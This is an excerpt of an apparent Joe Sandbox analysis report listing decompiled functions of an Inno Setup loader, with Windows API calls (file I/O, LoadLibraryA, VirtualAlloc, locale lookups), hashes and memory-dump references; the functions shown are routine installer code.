Opcode Fuzzy Hash: 486d5fe44f70020a4dd07c112c1ecb1f1a02d0fe2caacd69a5ab5c79924fdc84
Instruction Fuzzy Hash: 5EF0C271A04609ABCB01DFB59D4149EB3E8EB8835475149BBF814F33C2EE3D5E00959C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A25A Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040A25A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t1;
				int _t2;
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t16;
				void* _t17;
				void* _t18;

				_t18 = __esi;
				_t17 = __edi;
				_t11 = __ebx;
				_t1 =  *0x40cdec; // 0x0
				_t2 = E00402924(_t1);
				if( *0x40ce00 != 0) {
					_t16 =  *0x40ce00; // 0x20e7e60
					_t2 = E004094B0(0, _t16, 0xfa, 0x32); // executed
				}
				if( *0x40cdf8 != 0) {
					_t8 =  *0x40cdf8; // 0x20e7da4
					_t2 = RemoveDirectoryA(E00403414(_t8)); // executed
				}
				if( *0x40b244 != 0) {
					_t2 =  *0x40b244; // 0x4023c
					_push(_t2); // executed
					L00404534(); // executed
				}
				if( *0x40cddc != 0) {
					_t3 =  *0x40cddc; // 0x0
					_t12 =  *0x40cde0; // 0x1
					E0040357C(_t3, _t11, _t12, E00408BE8, _t17, _t18);
					_t5 =  *0x40cddc; // 0x0
					E004025AC(_t5);
					 *0x40cddc = 0;
					return 0;
				}
				return _t2;
			}

0x0040a25a
0x0040a25a
0x0040a25a
0x0040a1cc
0x0040a1d1
0x0040a1dd
0x0040a1eb
0x0040a1f3
0x0040a1f3
0x0040a1ff
0x0040a201
0x0040a20c
0x0040a20c
0x0040a218
0x0040a21a
0x0040a21f
0x0040a220
0x0040a220
0x0040a22c
0x0040a22e
0x0040a233
0x0040a23e
0x0040a243
0x0040a248
0x0040a24f
0x00000000
0x0040a24f
0x0040a254

APIs

RemoveDirectoryA.KERNEL32(00000000,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A20C
740C9840.USER32(0004023C,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A220

Part of subcall function 004094B0: Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A1F8,000000FA,00000032,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004094CF
Part of subcall function 004094B0: GetLastError.KERNEL32(?,?,?,0000000D,?,0040A1F8,000000FA,00000032,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000), ref: 004094F2
Part of subcall function 004094B0: GetLastError.KERNEL32(?,?,?,0000000D,?,0040A1F8,000000FA,00000032,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000), ref: 004094FC

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$C9840DirectoryRemoveSleep
String ID:
API String ID: 532274383-0
Opcode ID: f4ad5c726656b522891260f221d2d144982ddaf612aaa34d31a554fac5f9b1f8
Instruction ID: 9623e569a849d4e308069b9b649f3c7b83443d72ecb83dbbfa9b32499e00005d
Opcode Fuzzy Hash: f4ad5c726656b522891260f221d2d144982ddaf612aaa34d31a554fac5f9b1f8
Instruction Fuzzy Hash: 07F0EC70650241DBD725EB69EEC9B1537A6AB84309F10863FA110BB3F1CB7D9881DB4E

Uniqueness

Uniqueness Score: -1.00%

Function 00406F78 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00406F78(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x406fea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x406fcc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryA(E00403414(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E00406FD3);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x00406f79
0x00406f7b
0x00406f7f
0x00406f82
0x00406f87
0x00406f8c
0x00406f8d
0x00406f92
0x00406f95
0x00406f98
0x00406f9d
0x00406f9e
0x00406fa3
0x00406fa6
0x00406fb1
0x00406fb6
0x00406fbb
0x00406fbe
0x00406fc1
0x00406fc6
0x00406fc8
0x00406fcb

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406F82
LoadLibraryA.KERNEL32(00000000,00000000,00406FCC,?,00000000,00406FEA,?,00008000), ref: 00406FB1

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 9bb444f821fc15403207f038a36a1fd1391ece75305d117941faeb9d6251d2ec
Instruction ID: c6221f459327d28178afdea4356dfb93fe24e72ffe2b5c3e7aea950e8dfec0bf
Opcode Fuzzy Hash: 9bb444f821fc15403207f038a36a1fd1391ece75305d117941faeb9d6251d2ec
Instruction Fuzzy Hash: 7AF0E270614704BFCB029FB28C6282BBBACE74DB0435348B6F900A26C2E63C48208528

Uniqueness

Uniqueness Score: -1.00%

Function 00407644 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407644(intOrPtr* __eax, void* __edx) {
				long _v16;
				long _v20;
				long _t8;
				long _t9;
				intOrPtr* _t11;

				asm("movsd");
				asm("movsd");
				_t11 = __eax;
				_t8 = SetFilePointer( *(__eax + 4), _v20,  &_v16, 0); // executed
				_t9 = _t8 + 1;
				if(_t9 == 0) {
					_t9 = GetLastError();
					if(_t9 != 0) {
						_t9 = E00407464( *_t11);
					}
				}
				return _t9;
			}

0x0040764f
0x00407650
0x00407651
0x00407663
0x00407668
0x00407669
0x0040766b
0x00407672
0x00407676
0x00407676
0x00407672
0x00407680

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00407663
GetLastError.KERNEL32(?,?,?,00000000), ref: 0040766B

Part of subcall function 00407464: GetLastError.KERNEL32(00407364,00407502,?,?,020D03CC,?,00409CA6,00000001,00000000,00000002,00000000,0040A29D,?,00000000,0040A2D4), ref: 00407467

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 2362fb57c069a59edc6b07115e076c9201da44b81893de96415453d21e10638e
Instruction ID: 8a8614724b44ad3f1e1b06f94ae6b85d41b661bfaae6cadd9acd70ad5f9ea5ce
Opcode Fuzzy Hash: 2362fb57c069a59edc6b07115e076c9201da44b81893de96415453d21e10638e
Instruction Fuzzy Hash: 97E092B66086006BD600D66DC881F9B37DCDFC53A4F044536B658EB2D2D675AC00C766

Uniqueness

Uniqueness Score: -1.00%

Function 00407604 Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00407604(intOrPtr* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t7;
				intOrPtr* _t12;

				_push(__ecx);
				_t12 = __eax;
				_t7 = ReadFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t7 == 0 && ( *((char*)(_t12 + 8)) != 0 || GetLastError() != 0x6d)) {
					E00407464( *_t12);
				}
				return _v16;
			}

0x00407607
0x0040760c
0x0040761b
0x00407622
0x00407636
0x00407636
0x00407642

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040761B
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0040762A

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 970ca03e414f5fabc88d15e585bd5f2e7efa6c5b9f6a2932836872060c4b8460
Instruction ID: f966e59564675df6868c8d067e4a22cf49cc9de2649a5773e26732f77c666011
Opcode Fuzzy Hash: 970ca03e414f5fabc88d15e585bd5f2e7efa6c5b9f6a2932836872060c4b8460
Instruction Fuzzy Hash: D6E092A16081506ADB20D65E9DC4F676BDCCBC5324F0444BBF548DB282C678DC05C7B7

Uniqueness

Uniqueness Score: -1.00%

Function 0040759C Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040759C(intOrPtr* __eax, long* __edx) {
				long _t8;
				long* _t11;
				intOrPtr* _t13;

				_t11 = __edx;
				_t13 = __eax;
				 *(__edx + 4) = 0;
				_t8 = SetFilePointer( *(__eax + 4), 0, __edx + 4, 1); // executed
				 *_t11 = _t8;
				if( *_t11 == 0xffffffff) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						return E00407464( *_t13);
					}
				}
				return _t8;
			}

0x0040759e
0x004075a0
0x004075a4
0x004075b3
0x004075b8
0x004075bd
0x004075bf
0x004075c6
0x00000000
0x004075ca
0x004075c6
0x004075d1

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075B3
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075BF

Part of subcall function 00407464: GetLastError.KERNEL32(00407364,00407502,?,?,020D03CC,?,00409CA6,00000001,00000000,00000002,00000000,0040A29D,?,00000000,0040A2D4), ref: 00407467

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 303708fb520390c6cfb9d66ea44111f78cc0aab6dfaabb1055785f2f195422a2
Instruction ID: 14d735e5778efeb65a9a9c8f659c0be67b135111fa97660ec34a7a50301ecc70
Opcode Fuzzy Hash: 303708fb520390c6cfb9d66ea44111f78cc0aab6dfaabb1055785f2f195422a2
Instruction Fuzzy Hash: BBE04FB2600210AFDB10EEB98881B9276D99F44364F0485B6E614DF2C6D274DC008766

Uniqueness

Uniqueness Score: -1.00%

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401430(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004012E4(0x40c43c, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00401433
0x0040143d
0x0040144c
0x0040143f
0x0040143f
0x0040143f
0x00401452
0x0040145f
0x00401464
0x00401466
0x0040146a
0x00401473
0x0040147a
0x00401486
0x0040148d
0x00000000
0x0040148d
0x0040147a
0x00401492

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: efc6f27fa4c1f0416fcf42a0cb9c981ca4ea103f0f96f52908972bf4ed8d2b74
Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
Opcode Fuzzy Hash: efc6f27fa4c1f0416fcf42a0cb9c981ca4ea103f0f96f52908972bf4ed8d2b74
Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405248 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00405248(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				void* _t76;
				void* _t77;
				intOrPtr _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t113;

				_v16 = 0;
				_v20 = 0;
				_push(_t113);
				_push(0x40537e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffff0;
				_v12 = GetSystemDefaultLCID();
				_t76 = 1;
				_t109 = 0x40c4bc;
				_t106 = 0x40c4ec;
				do {
					_t6 = _t76 + 0xffbf; // 0xffc0
					E00404CA4(_t6,  &_v20);
					_t8 = _t76 + 0x44; // 0x45
					E004051D4(_v12, _v20, _t8 - 1,  &_v16); // executed
					E004031E8(_t109, _t76, _v16, _t106, _t109);
					_t13 = _t76 + 0xffcf; // 0xffd0
					E00404CA4(_t13,  &_v20);
					_t15 = _t76 + 0x38; // 0x39
					E004051D4(_v12, _v20, _t15 - 1,  &_v16);
					E004031E8(_t106, _t76, _v16, _t106, _t109);
					_t76 = _t76 + 1;
					_t106 = _t106 + 4;
					_t109 = _t109 + 4;
				} while (_t76 != 0xd);
				_t77 = 1;
				_t110 = 0x40c51c;
				_t107 = 0x40c538;
				do {
					_t18 = _t77 + 5; // 0x6
					asm("cdq");
					_v8 = _t18 % 7;
					_t26 = _t77 + 0xffdf; // 0xffe0
					E00404CA4(_t26,  &_v20);
					E004051D4(_v12, _v20, _v8 + 0x31,  &_v16);
					E004031E8(_t110, _t77, _v16, _t107, _t110);
					_t33 = _t77 + 0xffe6; // 0xffe7
					E00404CA4(_t33,  &_v20);
					E004051D4(_v12, _v20, _v8 + 0x2a,  &_v16);
					E004031E8(_t107, _t77, _v16, _t107, _t110);
					_t77 = _t77 + 1;
					_t107 = _t107 + 4;
					_t110 = _t110 + 4;
				} while (_t77 != 8);
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00405385);
				return E004031B8( &_v20, 2);
			}

0x00405253
0x00405256
0x0040525b
0x0040525c
0x00405261
0x00405264
0x0040526c
0x0040526f
0x00405274
0x00405279
0x0040527e
0x00405285
0x0040528b
0x00405293
0x0040529a
0x004052a4
0x004052b0
0x004052b6
0x004052be
0x004052c5
0x004052cf
0x004052d4
0x004052d5
0x004052d8
0x004052db
0x004052e0
0x004052e5
0x004052ea
0x004052ef
0x004052ef
0x004052f7
0x004052fa
0x00405304
0x0040530a
0x0040531b
0x00405325
0x00405331
0x00405337
0x00405348
0x00405352
0x00405357
0x00405358
0x0040535b
0x0040535e
0x00405365
0x00405368
0x0040536b
0x0040537d

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040537E), ref: 00405267

Part of subcall function 00404CA4: LoadStringA.USER32 ref: 00404CC1

Part of subcall function 004051D4: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,0040529F,?,00000000,0040537E), ref: 004051F2

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: bd08203dfd1e2cdc566f3cc36cb051c66b6c2af4478d84cde9e996adfea6d84e
Instruction ID: ef0034ac11dd00fa4fa4dd94400052267809670aea2942909165ae0b11bbb078
Opcode Fuzzy Hash: bd08203dfd1e2cdc566f3cc36cb051c66b6c2af4478d84cde9e996adfea6d84e
Instruction Fuzzy Hash: 78316971E00109ABCF00EB95C8C09EEB379FF84304F1185B7E815BB285E779AA018B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040754E Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040754E(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t20;

				_t20 = CreateFileA(E00403414(__edx),  *0x0040B158,  *0x0040B164, 0,  *0x0040B174, 0x80, 0); // executed
				return _t20;
			}

0x00407590
0x00407598

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407590

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 645ed33e658d4287fce7fe865531fecfa66d392abaaba43dd083ce1d414f9237
Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
Opcode Fuzzy Hash: 645ed33e658d4287fce7fe865531fecfa66d392abaaba43dd083ce1d414f9237
Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00407550 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407550(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t20;

				_t20 = CreateFileA(E00403414(__edx),  *0x0040B158,  *0x0040B164, 0,  *0x0040B174, 0x80, 0); // executed
				return _t20;
			}

0x00407590
0x00407598

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407590

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 99841a43b356e7c3a1e18c67bc8ed173c0be6e5724788e49e9a2555951b2a148
Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
Opcode Fuzzy Hash: 99841a43b356e7c3a1e18c67bc8ed173c0be6e5724788e49e9a2555951b2a148
Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8

Uniqueness

Uniqueness Score: -1.00%

Function 004069B4 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E004069B4(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push(0x4069fc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E00406950(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesA(E00403414(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00406A03);
				return E00403198( &_v8);
			}

0x004069b7
0x004069c0
0x004069c1
0x004069c6
0x004069c9
0x004069d1
0x004069df
0x004069e8
0x004069eb
0x004069ee
0x004069fb

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,004069FC,?,?,?,?,00000000,?,00406A11,00406D3F,00000000,00406D84,?,?,?), ref: 004069DF

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ba6dbf82dd4c80ab043ad377b2faacfe4bb2f10186a0eb9e11a5006d2e6a37ff
Instruction ID: 50023cacb829c756930c8ef42afa3de09d822a78ec84947b2b11458b6e0430c1
Opcode Fuzzy Hash: ba6dbf82dd4c80ab043ad377b2faacfe4bb2f10186a0eb9e11a5006d2e6a37ff
Instruction Fuzzy Hash: 40E09271304308BFD701FFB2DC52E5ABBECDB8A704BA2447AB501F7A82D6795E109568

Uniqueness

Uniqueness Score: -1.00%

Function 004076A0 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004076A0(intOrPtr* __eax, long __ecx, void* __edx, void* __ebp) {
				long _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t6;
				intOrPtr* _t9;
				long _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t14 = __edx;
				_t9 = __eax;
				_t6 = WriteFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t6 == 0) {
					_t6 = E00407464( *_t9);
				}
				if(_t15 != _v16) {
					_t6 = E004073C4(_t9, 0x1d, _t14, _t15);
				}
				return _t6;
			}

0x004076a3
0x004076a4
0x004076a6
0x004076a8
0x004076b7
0x004076be
0x004076c2
0x004076c2
0x004076ca
0x004076d3
0x004076d3
0x004076dc

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076B7

Part of subcall function 00407464: GetLastError.KERNEL32(00407364,00407502,?,?,020D03CC,?,00409CA6,00000001,00000000,00000002,00000000,0040A29D,?,00000000,0040A2D4), ref: 00407467

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 7f31a413d1896cd5fed01bc8c2157059cd98d3e6cfd99fe15611152cc6dccc47
Instruction ID: c943d9696eca60b6ecc810771e4453eebef42da74a5a65bbeabf8eb76ebd2830
Opcode Fuzzy Hash: 7f31a413d1896cd5fed01bc8c2157059cd98d3e6cfd99fe15611152cc6dccc47
Instruction Fuzzy Hash: 3CE092727181106BDB10E65ED880E6B6BDCCFC5324F00447BB904EB291C574AC008776

Uniqueness

Uniqueness Score: -1.00%

Function 0040725C Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040725C(long __eax, void* __edx) {
				char _v1028;
				long _t6;
				void* _t9;
				intOrPtr _t15;
				void* _t16;

				_t9 = __edx;
				_t6 = FormatMessageA(0x3200, 0, __eax, 0,  &_v1028, 0x400, 0); // executed
				while(_t6 > 0) {
					_t15 =  *((intOrPtr*)(_t16 + _t6 - 1));
					if(_t15 <= 0x20) {
						L1:
						_t6 = _t6 - 1;
						__eflags = _t6;
						continue;
					} else {
						_t19 = _t15 - 0x2e;
						if(_t15 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00403278(_t9, _t6, _t16, _t19);
			}

0x00407263
0x0040727b
0x00407283
0x00407287
0x0040728e
0x00407282
0x00407282
0x00407282
0x00000000
0x00407290
0x00407290
0x00407293
0x00000000
0x00000000
0x00407293
0x00000000
0x0040728e
0x004072a6

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004090FF,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0040727B

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: c112a03637410c92fe36c401061c47e0c7c748e750cf07d78af355dd169ef217
Instruction ID: 091b45cfadf5df2f8fe10cfe00dc09419b5d053a53548cda031b8ca89236cc59
Opcode Fuzzy Hash: c112a03637410c92fe36c401061c47e0c7c748e750cf07d78af355dd169ef217
Instruction Fuzzy Hash: 35E09AA0B8830126F26518945C87B7A124AA380B04F24407E7A40AD2C2CABEAA0A429B

Uniqueness

Uniqueness Score: -1.00%

Function 00407684 Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407684(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00407464( *_t7);
				}
				return _t4;
			}

0x00407685
0x0040768b
0x00407692
0x00000000
0x00407696
0x0040769c

APIs

SetEndOfFile.KERNEL32(?,020E7EAC,0040A064,00000000), ref: 0040768B

Part of subcall function 00407464: GetLastError.KERNEL32(00407364,00407502,?,?,020D03CC,?,00409CA6,00000001,00000000,00000002,00000000,0040A29D,?,00000000,0040A2D4), ref: 00407467

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
